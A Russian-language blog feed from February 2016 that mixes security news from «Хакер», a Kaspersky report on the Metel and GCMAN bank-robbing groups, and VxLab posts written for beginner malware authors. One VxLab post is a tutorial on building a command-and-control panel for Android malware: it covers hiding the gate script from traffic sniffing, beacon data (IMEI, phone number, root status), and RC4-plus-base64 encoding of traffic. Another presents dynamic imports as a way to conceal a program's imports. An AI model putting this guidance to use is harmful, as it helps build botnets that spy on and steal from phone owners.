суббота, 20 февраля 2016 г.

О дизайне кода

Правильно разработанный код не только легко читается, но легко масштабируется …

Это очень полезно не только при командной работе, но и когда Вы пишите проект в одиночку, как заметил автор статьи “Порядок в коде – порядок в голове”. Но увы, дизайн кода не исправишь авто-форматированием в отличии от оформления.
По этому даже код в одном стиле может стать адом при добавлении нового функционала.

Каких принципов лучше придерживаться при написании кода?

На этот вопрос в интернете можно найти много информации, к примеру материалы Joshua Bloch-a ( линк1, линк2 ).
Но, учитывая специфику данного сайта, хотелось бы выделить несколько принципов которые забывают или избегают начинающие малваршики.

  • Процедурный стиль в программировании. Я думаю не стоит объяснять какие преимущества дает ООП при написании кода.
  • Называйте методы/классы явно. Например, если у вас есть метод с именем registerUser, то он должен регистрировать пользователя и ничего больше не делать. но если вдруг он помимо регистрации еще и логинит пользователя, тогда его следует назвать loginAndRegisterUser, либо вынести этот функционал в 2 разных метода.
  • Разделяйте сервисы и данные. Почти во всех приложениях можно разделить код как минимум на 2 части, это Данные(Классы которые имеют состояние и не содержат в себе код с логикой) и Сервисы(Которые не имеют состояния, и содержат в себе код с логикой). Данное разделение полезно во первых из-за того что сервисы не имеющие состояния потоко-безопасны, во вторых это позволяет тестировать функционал сервисов независимо от всего приложения (Unit тестирование).
  • Код должен быть само документируемым, смотря на код не должно быть вопросов, почему или зачем вы это написали. Писать комментарии нужно только в случае неявных действий в коде (которых как сказано во втором пункте нужно избегать, но увы, без этого иногда не обойтись).
  • Избегайте магических чисел  (сабж) , выносите их в константы, если это не достаточно явно, в комментариях поясняйте зачем нужны эти числа.
    Когда Вы пишете код, Вы помните зачем нужно это число, но если вы посмотрите на код спустя год или это сделает другой человек, ему нужно будет потратить некоторое время, что бы понять почему там стоит именно это число.К примеру:
// Занесем полученные от сервера атрибуты
экрана в буфер консоли
WriteConsoleOutputAttribute
 (hConsoleOutput,(const WORD *)
 (&buffer.consoleBuffer.Attribute),
 8000 ,
 dwWriteCoord,
 &NumberOfcharsWriten);

Первый вопрос который хочется задать, что такое 8000 ? может быть это какой то флаг, может быть размер буффера ? Да и почему 8000, почему не 42 , или почему не 8003 ?

Разве не лучше выглядит код:

const DWORD CONSOLE_BUFFER_SIZE = 8000;

// Занесем полученные от сервера атрибуты
экрана в буфер консоли
WriteConsoleOutputAttribute
 (hConsoleOutput,(const WORD *)
 (&buffer.consoleBuffer.Attribute),
 CONSOLE_BUFFER_SIZE ,
 dwWriteCoord,
 &NumberOfcharsWriten);
  • Используйте наследование только если вы можете сказать что класс наследник является классом родителя. И не забывайте называть классы осмысленно.

Например:

//java code
public class Network extends Service{
        @Override
        public int onStartCommand(Intent intent, int flags, int startId) {
                return Service.START_STICKY;
        }
        
        ...
}

Здесь было бы верно назвать класс NetworkService.

  • Используйте паттерны, но умеренно, достаточно часто начинающие девелоперы выучив новый паттерн мыслят не в стиле: “О, хороший случай что бы применить такой то паттерн” , а в стиле: “Я знаю крутой паттерн, где бы мне его применить” и во втором случае есть вероятность нарваться на design hell.
    Про другую крайность, а именно  – игнорирования дизайна кода можно почитать в этой статье.

P.S.
Если вас понравилась моя статья, Я напишу продолжение уже на примере малваки,  мы рассмотрим  весь цикл написания проекта, от юзкейсов, до готового приложения, затронув unit-тестирование и системы контроля версий.

С вами был C@t  и до скорых встреч!

Запись О дизайне кода впервые появилась VxLab.



from VxLab http://ift.tt/24i32AJ
via IFTTT

Исходный код банковского трояна для Android утек в сеть

Команда IBM X-Force предупреждает: в ближайшее время банковской малвари для Android должно стать больше. В открытый доступ попали исходные коды трояна GM Bot, на базе которого были созданы такие небезызвестные вредоносы, как SlemBunk, Bankosy и Mazar BOT.

from «Хакер» http://ift.tt/1L0Of75
via IFTTT

Продукты Comodo устанавливают на ПК пользователя опасную утилиту удаленной поддержки

Эксперт Google Project Zero Тевис Орманди (Tavis Ormandy) известен тем, что любит находить баги в продуктах разработчиков антивирусных решений. Ранее Орманди уже прошелся по программам компаний Avast, AVG, Malwarebytes, Trend Micro и FireEye. Также Орманди совсем недавно критиковал компанию Comodo за ее «защищенный» браузер. Новое разоблачение исследователя снова касается продуктов Comodo, теперь эксперт обнаружил, что компания устанавливает на компьютеры пользователей VNC-сервер для осуществления удаленной технической поддержки.

from «Хакер» http://ift.tt/1KxChlB
via IFTTT

Уязвимость JSF**k, которую eBay отказался исправить, уже эксплуатируют хакеры

В начале февраля 2016 года эксперты компании Check Point рассказали о том, что аукцион eBay отказывается исправлять опасную уязвимость в своей платформе. Тогда баг не показался сотрудникам eBay сколь-нибудь опасным, невзирая на все возражения специалистов. Теперь ситуация усугубилась, хотя разработчики eBay все же попытались создать патч. К сожалению, вышедшее исправление проблему не устранило, а уязвимость уже начали использовать хакеры.

from «Хакер» http://ift.tt/21fIdmY
via IFTTT

Самый безопасный IM. Рассматриваем клиенты Tox для Linux

Для подписчиков
Tox — новый протокол (разработка активно ведется с лета 2013 года) для обмена текстовыми сообщениями, голосовой и видеосвязи, созданный как альтернатива Skype и другим VoIP-сервисам. Как и Skype, Tox предлагает голосовую и видеосвязь, конференции с несколькими участниками, сетевые статусы, эмотиконы, обмен текстовыми сообщениями и передачу файлов. И никакой рекламы.

from «Хакер» http://ift.tt/1oRnW9B
via IFTTT

Вымогатель Locky использует для распространения вредоносные макросы

Эксперты компаний Palo Alto Networks и Sophos одновременно сообщили об обнаружении нового шифровальщика Locky, атакующего пользователей компьютеров, работающих под управлением Windows. Тогда как по методам работы новый шифровальщик скорее напоминает CryptoWall, для его распространения используются техники позаимствованные у банковского трояна Dridex.

from «Хакер» http://ift.tt/1KxnaZf
via IFTTT

пятница, 19 февраля 2016 г.

Исследователь продемонстрировал удаленный взлом сигнализации SimpliSafe

В январе 2016 года мы рассказывали об умном видеодомофоне, который можно взломать при помощь обычной отвертки. Исследователь компании IOActiv Эндрю Зоненберг (Andrew Zonenberg) выяснил, что некоторых охранные системы, призванные защитить людей и их имущество, ушли совсем недалеко от того домофона. Эксперт сумел взломать сигнализацию SimpliSafe с расстояния 30 метров, полностью отключил систему безопасности и теперь сообщает, что исправить уязвимость и сделать SimpliSafe безопасной, невозможно.

from «Хакер» http://ift.tt/1L0uEny
via IFTTT

Видеорегистраторы для хранения записей с камер наблюдения имеют встроенный root-пароль

Эксперты компании Risk Based Security обнаружили в устройствах китайской фирмы RaySharp критический баг. Данные видеорегистраторы (DVR) пользуются немалой популярностью, к примеру, производитель сообщает, что ежемесячно отгружает со складов 60000 девайсов. Тем неприятнее, что все они оснащаются жестко закодированным логином «root» и паролем «519070» или не имеют пароля вообще.

from «Хакер» http://ift.tt/1PYZ0nc
via IFTTT

Ассемблер, прощай!

Дружок, если ты соблюдаешь верность ассемблеру, а не пишешь на си – эта статья для тебя.

Почему мы пишем только на асме?

Когда-то давно это было вполне допустимо и считалось признаком мастерства. Во времена 32-битных систем это было вполне оправданно, но с приходом 64-битных ассемблерщикам пришлось не сладко.

Разумеется, основные опкоды просто расширили DWORD до QWORD и стали занимать места на 4 байта больше. В 64-битном мире больше не нужны релоки, все относительные адреса помещаются в 4 байта!

Я постараюсь перечислить основные преимущества Си, как оказалось осталось множество людей которые не могут пересесть на новую лошадку в силу страха неизвестного или предубеждений.

  1. Легкая компиляция как в 32 так и 64 битных файлов. Зачастую достаточно просто переключить режим сборки и если код написан правильно, он будет одинаково хорошо работать и там и там. Единственное ограничение – ассемблерные вставки, для 64 битных сборок их надо делать в отдельном файле.
  2. Больше хидеров. Каждый кто писал на асме знает – перегонять хидеры из msdn – неизбежное зло. На си они поставляются вместе с sdk или даже visual studio.
  3. Больше исходников. В силу того, что написав приложение используя только стандартную библиотеку си – оно будет кросплатформенно, исходников на си огромное множество. Больше не придется выдирать бинарные куски или переписывать алгоритмы с других языков.
  4. Классы, у Си с плюсами есть эта классная фишка. Они могут казаться чем-то подозрительным, но когда вы посмотрите как они выглядят в ассемблированном виде вы успокоитесь. Классы абсолютно не избыточны и не тормозят работу программы, но ускоряют разработку и облегчают понимание кода.
  5. Оптимизация. Коронная фишка ассемблера. Времена ms-dos давно прошли, никто не заметит лишнюю пару сотен процессорных тактов, да и ключи оптимизации компилятора позволят сильно срезать углы! На хабре обсуждалось какие ключи дают лучшую производительность, но скажу по секрету, что лучшую производительность даёт лучший алгоритм.
  6. Дебаг. Снова ставить int3 и ловить исключение в Olly? Нет, отладка в VisualStudio позволяет идти прямо по сишному коду, заглядывая в значение переменных, раскрывая вложенные структуры и даже подсматривая ассемблерный код!

Для меня решающим фактором для перехода на Си и плюсы в частности послужил класс Cmem, который избавил меня от головной боли по поводу утечки памяти. Деструктор (функция вызываемая при выходе из области видимости экземпляра класса, по сути перед ret в функции) – освобождал мою память неявно и автоматически, чем полностью покорил моё сердце…

P/S Если вы тоже прошли долгий путь от “Пишу всё на ассемблере” до “Пересел на си”, расскажите о нём в комментариях!

Запись Ассемблер, прощай! впервые появилась VxLab.



from VxLab http://ift.tt/1SXluLI
via IFTTT

Что происходит с личными данными после взлома: эксперимент компании Bitglass

Исследователи компании Bitglass провели интересный эксперимент, озаглавленный «Где ваши данные?» (Where’s Your Data?). Специалисты создали сайт вымышленного банка, снабдили его несуществующих служащих фейковыми личностями, подключили аккаунт Google Drive и добавили ко всему этому информацию о настоящих банковских картах. Затем аналитики Bitglass сами слили эти сфабрикованные данные в даркнет, под видом результата фишинговой атаки, и принялись ждать.

from «Хакер» http://ift.tt/1KuhnDO
via IFTTT

Голливудская клиника заплатила выкуп $17000, чтобы избавиться от шифровальщика

Ранее на этой неделе сообщалось, что работа Голливудского пресвитерианского медицинского центра (Hollywood Presbyterian Medical Center) оказалась в буквальном смысле парализована из-за заражения вымогательским ПО. Больница была вынуждена передать некоторых пациентов другим клиникам и отказаться от использования техники в пользу ручки и бумаги. По информации СМИ, хакеры требовали 9000 биткоинов выкупа, что составляет порядка 3,6 млн долларов США. Теперь представители клиники рассказали, что случилось на самом деле. Нет, СМИ практически не ошиблись, но сильно преувеличили сумму выкупа.

from «Хакер» http://ift.tt/1Ku8BFG
via IFTTT

PoC 2015: фингерпринтинг смартфонов. Колонка Дениса Макрушина

Для подписчиков
Power of Community — южнокорейская конференция по практической информационной безопасности, где вот уже с 2006 года собирается преимущественно корейская и китайская аудитория. Несмотря на кажущуюся «местечковость», программа мероприятия пестрит докладами спикеров из разных стран, чьи имена часто встречаются на более крупных конференциях.

from «Хакер» http://ift.tt/1XBlFew
via IFTTT

Twitter, Facebook и McAffee поддержали Apple в споре с ФБР

Открытое письмо главы Apple Тима Кука, а также прямой отказ компании исполнять предписание суда и помогать ФБР взломать iPhone террориста, спровоцировало в сети настоящий информационный шторм. Позицию Apple практически сразу поддержал глава Google Сундар Пичаи, а теперь к нему присоединились также представители Facebook и Twitter. Основатель компании McAfee и кандидат на пост президента США Джон Макафи вообще пообещал властям взломать этот злосчастный iPhone 5c бесплатно, не создавая никаких бэкдоров, а в противном случае он грозится съесть свой ботинок.

from «Хакер» http://ift.tt/24dQgDf
via IFTTT

Apple исправила «ошибку 53» и извинилась перед пользователями

Парни из iFixit были правы – если привлечь к «ошибке 53» достаточно внимания и спровоцировать скандал, Apple будет вынуждена что-то предпринять. Компания исправила баг, в результате которого iPhone отказывается работать после замены в неофициальном сервисе сканера отпечатков пальцев Touch ID (он встроен в кнопку «Домой») или кабеля, которым тот подключается к плате.

from «Хакер» http://ift.tt/1WvjwQb
via IFTTT

четверг, 18 февраля 2016 г.

Новый тренд в области DDoS-атак: хакеры стали использовать протокол DNSSEC

Специалисты компании Akamai зафиксировали новую тенденцию в области усиленных DDoS-атак: теперь хакеры все чаще используют для этих целей протокол DNSSEC.

from «Хакер» http://ift.tt/21cHXp2
via IFTTT

Специалисты придумали еще один способ взлома отключенных от сети компьютеров

Компьютеры физически изолированные от интернета и любых других любых сетей, по праву считаются одними из наиболее защищенных устройств. При этом они неизменно привлекают внимание экспертов во всего мира: исследователи упорно пытаются взломать такие машины, придумывая все новые способы атак. Сводная группа ученых из Тель-авивского университета и компании Technion представила новый способ похищения данных с изолированного от внешней среды компьютера, стоящего в соседней комнате.

from «Хакер» http://ift.tt/1WvbGWK
via IFTTT

Вирусы под андроид. №2 (Разработка админки)

Начинаем второй мини урок или куда прикрутить наше чудо, которое мы написали. Я не буду описывать как написать админку с нуля или как правильно писать сайты. Тут будет чисто теория и методы. Итак приступим. Первое, что нам потребуется это гейт.

Гейт – это скрипт который будет принимать, отдавать команды. К примеру админка у нас стоит на http://site.ru/. Создаем скрипт gate.php. И кладём его в корень. Получаем наш гейт http://site.ru/gate.php. Важно: нельзя использовать слова gate и слова-маячки. Трафик может снифаться.

Этот скрипт будет принимать и отдавать команды. Самый верный способ – это отправка данных методом post и чтение вывода.

Получаем простую цепочку:

1. Определяем гейт.
2. Шлем отстук.
3. Забираем задачи, что гейт нам даст в ответ. (Лучше всего задачи забирать по одной, так как нам важно время обработки команд и память которыю мы используем на телефоне. Ведь там не как на компе, гигабайты ее. А java она все таки местами прожорливая.)
4. Шаг не всегда отрабатывает, так как не всегда нам нужно слать отчет о выполнении команд. Но если все таки надо. То мы это делаем 2м пунктом, но с определенным флагом.

Почему post? Чтобы в логах не было ничего кроме имени гейта.

А ,что слать то?

В отстук входят все основные параметры такие как imei, версия os, sdk, различные параметры пользователя. Кстати если вы не знаете как генерировать bot id, то imei будет в самый раз, чтобы различать всех ботов. Так как это уникальный параметр телефона. Все что вы считаете нужным, отсылаете, а ответ обрабатываете.

Список параметров рекомендуемый для отстука:
1. imei (id бота)
2. оператор
3. версия os
4. версия sdk(для разграничения функционала, так как до 4.4 и после разные методы работы используются)
5. модель телефона
6. серийный номер
7. есть ли рут (использовать расширенный функционал и консоль устройства)
8. версия билда (по этому параметру можно обновлять старые версии)
9. Номер телефона
10. Другии параметры важные вам

Формат запросов, самый удобный на мой взгляд это json. Но мы живем в 21м веке и этого мало. Это все надо шифровать еще.  Почему json? Его очень легко обрабатывать и на стороне сервера и на стороне клиента.Далее мы накладываем алгоритм шифрования. Самый простой это будет RC4, хотя их много, как говорится, на вкус и цвет товарища нет. Но тут мы столкнемся с одной проблемой, у нас могут появитсья всякого рода спец символы, с которыми возникнут сложности при передаче и декодировании. Выходом является обёртка из base64.

Алгоритм получается следующий:
1. Составляем json
2. Шифруем его RC4 или любым другим алгоритмом.
3. Оформляем в base64
4. Отправляем
5. Читаем вывод гейта.
6. Делаем все в обратном порядке. Снимаем base64 , расшифровываем, разбираем json. Если надо отрабатываем определенные действия.

Важный момент, что при обработке результата, нужно проверять, а действительно ли это админка. То есть должны быть специфичные сигнатуры ответа. Если их нет. То перестаем туда стучать.
Так же стоит учитывать, что на телефоне время отстука может чуток отличаться, я имею ввиду интервалы. Все это из-за специфичной работы сервисов на телефоне. Поэтому стоит брать время ожидания с запасом, для определения онлайн бот или нет.

Если что вспомню, допишу в комментариях. Получилось очень мало, так как написание админок – тема широко освещаемая. Просто механическая работа PHP программиста. Принял , обработал, отдал :) Следующий материал будет про сбор информации с телефона, где мы плотно рассмотрим, как и что можно с него грабить.

Запись Вирусы под андроид. №2 (Разработка админки) впервые появилась VxLab.



from VxLab http://ift.tt/1orGHzS
via IFTTT

Typedef generator

Я подумал, что будет неплохо обзавестись пачкой php-утилит. Под катом ссылка на код и все пояснения.

Довольно часто нам приходится (в целях сокрытия импорта) получать адреса функций динамически:

typedef BOOL (WINAPI *IsWow64Process2)(HANDLE hProcess,PBOOL  Wow64Process);
IsWow64Process2 proc = (IsWow64Process2) GetProcAddress(GetModuleHandleA("Kernel32"),"IsWow64Process");

Каждый раз переписывать прототип

BOOL WINAPI IsWow64Process(
  _In_  HANDLE hProcess,
  _Out_ PBOOL  Wow64Process
);

в typedef

typedef BOOL (WINAPI *IsWow64Process2)(HANDLE hProcess,PBOOL  Wow64Process);

крайне утомительно, по этой причине был написан простой скрипт на регулярках.

Исходник скрипта лежит здесь

Постоянная ссылка на генератор

Скрипт as is, можете допиливать под ваши нужды.

Попробуйте прогнать через него msdn определения!

Запись Typedef generator впервые появилась VxLab.



from VxLab http://ift.tt/1QM5e9G
via IFTTT

26 000 сайтов на базе WordPress используются для Layer 7 DDoS-атак

Эксперты компании Sucuri сообщили, что сайты под управлением WordPress вновь подвергаются массовым кибератакам. На этот раз против ресурсов на базе популярной CMS проводятся Layer 7 DDoS-атаки, которые к тому же эксплуатируют функцию pingback и генерируются ботнетом из... WordPress-сайтов.

from «Хакер» http://ift.tt/1QLhgAk
via IFTTT

Нежелательная реклама используется для распространения рекламы вредоносной

Когда браузерный аддон Wajam только начинал работу, он был многообещающим стартапом, но потом что-то пошло не так. Аддон был замечен в распространении нежелательной рекламы: он внедряет объявления в поиск Google, меняет стартовую страницу браузера и встраивает рекламные баннеры прямо в страницы посещаемых сайтов. Теперь аддон используется еще и для вредоносных рекламных кампаний и распространения эксплоит кита Angler.

from «Хакер» http://ift.tt/1Wtpf9e
via IFTTT

Popcorn Time снова в строю, новый разработчик предпочел остаться неизвестным

Популярный форк Popcorn Time, закрытый в прошлом году правообладателями из MPAA, неожиданно начал вновь подавать признаки жизни. Хотя оригинальная команда разработки покинула проект, официальный репозиторий GitHub и Twitter-аккаунт проекта теперь рекламируют новый релиз, представленный под именем «Hail Hydra» («Хайль Гидра»).

from «Хакер» http://ift.tt/1TokZbN
via IFTTT

Современный хешкрекинг. Взгляд на взлом хешей изнутри

Для подписчиков
Часто хакер проделывает огромную работу для проникновения в систему, и от получения к ней полного доступа его отделяет всего один шаг — подбор пароля к хешу (зашифрованному паролю администратора или нужного пользователя). На словах звучит просто, а как на деле? И что нужно знать и уметь, чтобы успешно восстанавливать даже самые стойкие пароли? А может, лучше сразу обратиться к тем, кто профессионально занимается хешкрекингом многие годы?

from «Хакер» http://ift.tt/1Qmo2SR
via IFTTT

Хакеры украли с мозговых кошельков Bitcoin более $100 000

Всего неделю назад сводная группа исследователей в очередной раз доказала, что так называемые мозговые кошельки Bitcoin нельзя считать безопасными, разработав новый способ их взлома, который работает быстрее в 2,5 раза. В своих изысканиях эксперты опирались на прошлогодний доклад с конференции DEFCON 23, представленный специалистами компании White Ops; руководил исследованием Райан Кастеллуччи (Ryan Castellucci). Теперь этот прошлогодний доклад был доработан, и новое исследование будет представлено 25 февраля, на конференции Financial Cryptography and Data Security в Барбадосе. Кастелуччи и его коллеги поведали, что обнаружили 863 взломанных мозговых кошелька.

from «Хакер» http://ift.tt/1R9ogtB
via IFTTT

среда, 17 февраля 2016 г.

Apple не будет делать уязвимую iOS по требованию ФБР и создавать опасный прецедент

Противостояние, от исхода которого зависит очень и очень многое, развернулось между компанией Apple и американскими спецслужбами (при поддержке со стороны правительства США). 16 февраля 2016 года калифорнийский суд обязал компанию Apple оказать содействие ФБР в расследовании массового убийства в Сан-Бернардино, случившегося в декабре 2015 года. От компании потребовали разблокировать iPhone 5c террориста Сеида Фарука. Apple отказалась исполнить предписание суда. Более того, Тим Кук обратился ко всем пользователям с открытым письмом, объяснив позицию компании и важность данной ситуации для всей индустрии в целом. Кука уже поддержали глава Google Сундар Пичаи и Эдвард Сноуден.

from «Хакер» http://ift.tt/1PSh3vn
via IFTTT

Российских пользователей Uber атакуют хакеры

Начиная с конца января 2016 года в сети стали появляться жалобы от российских пользователей Uber, которые сообщают о взломе своих аккаунтов. Хакеры в самых разных странах мира расплачиваются за поездки чужими средствами. Представители Uber затрудняются оценить масштаб проблемы.

from «Хакер» http://ift.tt/1oqFOIz
via IFTTT

Роскомнадзор заинтересовался онлайновыми играми

В интервью «Российской газете» глава Роскомнадзора Александр Жаров рассказал о том, что ведомство задумалось о регуляции онлайн-игр. Оставлять игры без внимания, по его мнению, нельзя, ведь, к примеру, во время парижских атак террористы общались посредством PlayStation4.

from «Хакер» http://ift.tt/1Q1CRbo
via IFTTT

Easy Hack. Hot Potato, SuperSerial и снова XSLT

Для подписчиков
Не так давно появилась «новая» атака, позволяющая повысить привилегии в Windows с обычного пользователя до SYSTEM. Причем работает она практически «из коробки» под всеми современными версиями Windows, впрочем, должна и под древними. Ее название — Hot Potato.

from «Хакер» http://ift.tt/20YIKx0
via IFTTT

В библиотеке glibc обнаружен баг, пользователи Linux под угрозой

Исследователи Google Project Zero и Red Hat сообщили о выявлении опасной проблемы в составе GNU C Library (glibc), которая используется практически во всех популярных дистрибутивах Linux. Баг найден в составе DNS-преобразователя и срабатывает в результате вызова функции getaddrinfo(). Фактически он позволяет спровоцировать стековое переполнение буфера и исполнение вредоносного кода.

from «Хакер» http://ift.tt/20YINc7
via IFTTT

вторник, 16 февраля 2016 г.

Роскомнадзор не собирается бороться с анонимайзерами

Тема обхода блокировок и вопросы противоправности этих действий в последние дни обсуждаются очень бурно. Тогда как правообладатели предложили штрафовать всех, кто «рекламирует» различные способы обхода блокировок, Роскомнадзор высказался на данную тему сдержано и аккуратно. Теперь представители ведомства объяснили свое отношение к использованию анонимайзеров развернуто.

from «Хакер» http://ift.tt/1PQ0obS
via IFTTT

Поисковик Knowledge Engine вызвал раскол в сообществе Wikipedia

В минувшие выходные фонд Wikimedia объявил о том, что его специалисты работают над созданием свободного поискового движка Knowledge Engine, на развитие которого осенью 2015 года был получен грант в размере $250 тысяч. Это сообщение спровоцировало скандал внутри Wikimedia Foundation и в сообществе Wikipedia.

from «Хакер» http://ift.tt/1R7sAt2
via IFTTT

Android-троян Mazar BOT распространяется через SMS и MMS-сообщения

Эксперты компании Heimdal Security обнаружили нового вредоноса, атакующего устройства на базе Android. Малварь не только распространяется нестандартным способом: посредством SMS и MMS-сообщений, но также способна получить root-доступ к устройству, похитить финансовую информацию и удалить все данные со смартфона жертвы.

from «Хакер» http://ift.tt/1XvIIqX
via IFTTT

GitHub игнорирует разработчиков, а SourceForge наконец отказался от навязчивой рекламы

Еще в январе 2016 года разработчики написали открытое письмо руководству GitHub и наконец дождались ответа. Но пока администрация GitHub извиняется и не делает ничего, у SourceForge сменилось руководство. Первым делом некогда популярный хостинг проектов избавился от партнерской программы DevShare, которая была ответственна за навязчивую рекламу, ненавистную разработчикам.

from «Хакер» http://ift.tt/1R6rmhW
via IFTTT

Малварь парализовала работу больницы, хакеры потребовали выкуп в размере $3,6 млн

Издание CSO и телеканал NBC Лос-Анджелес сообщают, что Голливудский пресвитерианский медицинский центр (Hollywood Presbyterian Medical Center) фактически взят в заложники хакерами. Больница на 430+ мест пострадала от кибератаки, в результате которой вымогательское ПО поразило внутреннюю сеть медицинского учреждения. Руководство больницы было вынуждено перевести некоторых пациентов в другие клиники и частично приостановить работу. Операторы вымогательской малвари требуют выкуп в размере 9000 биткоинов (3,6 млн долларов).

from «Хакер» http://ift.tt/1PYvJMZ
via IFTTT

Шифровальщик PadCrypt предлагает жертвам чат с хакерами и бесполезный деинсталлятор

Шведский исследователь, автор блогаAbuse.ch зафиксировал появление нового шифровальщика, основанного на старой версии вымогателя CryptoWall. Малварь носит имя PadCrypt, и от других представителей жанра ее отличают встроенный чат «поддержки», который позволяет жертве связаться со злоумышленниками, а также файл unistl.exe, который, как и следует из названия, является деинсталлятором.

from «Хакер» http://ift.tt/2168GDI
via IFTTT

Красный шум. Скрываем свою активность от продвинутой слежки

Для подписчиков
Есть немало способов отследить человека в Сети. Следы, позволяющие отличить одного пользователя от другого, оставляет практически всё: поисковые запросы, клики по ссылкам, настройки системы. «Баннерорезки» помогают уберечься от самой простой слежки, но постепенно начинают появляться и более хитрые способы замести следы.

from «Хакер» http://ift.tt/1Tnr7Ch
via IFTTT

Один из сайтов Microsoft разглашал данные пользователей

Исследователь Крис Викери (Chris Vickery) известен тем, что постоянно находит в сети уязвимые базы данных. Именно Викери обнаружил компрометацию данных 13 млн пользователей MacKeeper, 35 000 уязвимых баз MongoDB и утечку информации о 191 млн американских избирателей. На этот раз эксперт рассказал, что аналогичным проблемам подвержены даже ресурсы Microsoft.

from «Хакер» http://ift.tt/1KmHcWd
via IFTTT

понедельник, 15 февраля 2016 г.

Роскомназдор не поддержал идею введения штрафов за пропаганду обхода блокировок

Похоже, заявление правообладателей о том, что Роскомнадзор поддерживает законопроект о введении административной ответственности за «рекламу, пропаганду или иной призыв к использованию» средств обхода блокировок, оказалось преждевременным. Роскомнадзор еще ничего не одобрял.

from «Хакер» http://ift.tt/1QiTB9G
via IFTTT

Apple работает над исправлением бага 1970

Баг, который превращает устройства Apple в кучу неработающего железа, был обнаружен в конце прошлой недели, и за это время успел «убить» немало гаджетов. Компания Apple наконец признала проблему официально и пообещала все исправить.

from «Хакер» http://ift.tt/1OdkJpf
via IFTTT

Увеличивается количество APT-ограблений банков с использованием атак Metel, GCMAN и Carbanak 2.0

asp_full

asp_full

Введение

В конце 2014 года исследователи Лаборатории Касперского предостерегали: киберпреступники, целью которых являются финансовые операции, для ограбления банков будут использовать сложные тактики и технологии, характерные для атак серии APT.

Всего лишь несколько месяцев спустя в феврале 2015 мы объявили об обнаружении Carbanak ― криминальной группировки, которая использовала вредоносное ПО и APT-техники, чтобы украсть миллионы долларов, заразив при этом сотни финансовых организаций по меньшей мере в 30 странах.

С тех пор мы наблюдаем увеличение количества скрытых APT-атак, сочетающих использование разведки, социальной инженерии, специализированного вредоносного ПО, средств распространения и долгосрочного планирования кражи денег из финансовых организаций (в особенности, из банкоматов и систем денежных переводов).

На Security Analyst Summit (SAS 2016) «Лаборатория Касперского» объявила об обнаружении двух новых группировок, связанных с APT-ограблениями банков: Metel и GCMAN, ― и о возобновлении деятельности группировки Carbanak с новыми целями.

В 2015 году сотрудники «Лаборатории Касперского» провели расследование инцидентов в 29 организациях, расположенных в России и атакованных этими тремя группировками.

Так как правоохранительные органы продолжают расследования и в связи с соглашениями о неразглашении с пострадавшими организациями, «Лаборатория Касперского» не может предоставить подробные сведения об атаках. «Лаборатория Касперского» публикует ключевые индикаторы компрометации (IOS) и другие данные, чтобы помочь организациям в поиске следов этих атакующих групп в своих корпоративных сетях (см. ниже).

Metel ― откат баланса при помощи банкоматов

Летом 2015 российский банк обнаружил пропажу миллионов рублей, произошедшую за одну ночь в результате серии странных финансовых операций. Клиенты банка осуществляли снятие денег через банкоматы, принадлежащие другим банкам, и имели возможность снять огромные суммы денег, но при этом баланс их счета не менялся. Пострадавший банк ни о чем не догадывался до тех пор, пока не стал компенсировать снятие денег через банкоматы других банков.

При проведении расследования мы выяснили, в чем дело ― Metel, модульная вредоносная программа, так же известная как Corkow.

Вредоносное ПО, используемое исключительно группировкой Metel, заражало банковскую корпоративную сеть через электронные письма и распространялась по банковской ИТ-системе, получая доступ к компьютерам.

Получив доступ к системе, управляющей денежными транзакциями, преступники настраивали автоматический откат транзакций, совершаемых через банкоматы. Это означает, что деньги могли быть украдены из банкоматов посредством дебетовых карт, и при этом баланс счета карты оставался неизменным, позволяя совершать несколько транзакций в разных банкоматах.

Увеличивается количество APT-ограблений банков с использованием атак Metel, GCMAN и Carbanak 2.0

Зашифрованный конфигурационный файл вредоносных плагинов Metel

Увеличивается количество APT-ограблений банков с использованием атак Metel, GCMAN и Carbanak 2.0

В ходе расследование мы выяснили, что злоумышленники разъезжали по городам России, снимая деньги через банкоматы, принадлежащие разным банкам. Вследствие выполнения автоматического отката, деньги мгновенно возвращались на счет сразу же после снятия наличных в банкомате. Группировка работала только по ночам, опустошая банкоматы в разных местах.

В целом мы обнаружили Metel в более, чем 30 финансовых организациях, но сотрудники «Лаборатории Касперского» смогли очистить сети до того, как был причинен серьезный ущерб. С большой вероятностью можно утверждать, что эта угроза намного более распространена, и мы настоятельно советуем финансовым организациям по всему миру просканировать сети на наличие признаков вредоносного ПО Metel.

Преступная группировка Metel все еще активна. В настоящий момент у нас нет информации о жертвах за пределами России.

Увеличивается количество APT-ограблений банков с использованием атак Metel, GCMAN и Carbanak 2.0

GCMAN ― во всем виноваты средства тестирования системы на вторжения

Вторая группировка, которую мы называем GCMAN из-за того, что в основе вредоносного ПО лежит код, скомпилированный при помощи компилятора GCC, появилась недавно и использует похожие на Metel техники для заражения банковских организаций и перевода денег на сервисы криптовалют.

Первоначальное заражение выполняется посредством целевого фишинга финансовых организаций через электронные письма, содержащие вредоносный RAR-архив. При открытии RAR-архива вместо документа Microsoft Word запускается исполняемый файл, что вызывает заражение.

inf_cgman_RU

Попав в сеть, группировка GCMAN использует легальные технологии и средства для тестирования системы на проникновение, такие как Putty, VNC и Meterpreter, чтобы распространить заражение по сети. Наше расследование выявило атаку, при которой группа внедрила на банковский сервер cron-скрипт, отправляющий финансовые транзакции в размере 200$ в минуту. Планировщик каждую минуту вызывал скрипт, помещающий новые транзакции прямо в систему обработки платежей. Это позволяло группировке переводить деньги на разные сервисы криптовалют без оповещения других систем банка.

Увеличивается количество APT-ограблений банков с использованием атак Metel, GCMAN и Carbanak 2.0

Декомпилированный код вредоносного ПО группировки GCMAN, осуществляющий подключение к серверу управления

По счастливой случайности финансовые организации вовремя обнаружили подозрительную активность сети, нейтрализовали угрозу и отменили транзакции.

Интересным является тот факт, что реальная атака произошла примерно на 18 месяцев раньше, чем она была обнаружена. Группировка использовала MS SQL инъекции в коммерческое ПО, использовавшееся на одном из публичных веб-сервисов банка, и спустя полтора года они вернулись, чтобы украсть деньги. В этот период времени было заражено 70 внутренних хостов, скомпрометировано 56 учетных записей с использованием 139 источников атак (TOR и скомпрометированные домашние маршрутизаторы).

Мы обнаружили, что примерно за 2 месяца до инцидента кто-то пытался подобрать пароль для учетной записи администратора банковского сервера. Они действовали очень настойчиво, но, чтобы остаться незамеченными, только три раза в неделю, а затем только по субботам.

Исследовательская команда Лаборатории Касперского ответила трем финансовым организациям в России, которые были заражены вредоносным ПО GCMAN. Вероятно, эта угроза намного более распространена, и мы настоятельно советуем банкам проверить сети на наличие признаков этой киберпреступной группировки.

Carbanak 2.0: новые цели помимо банков

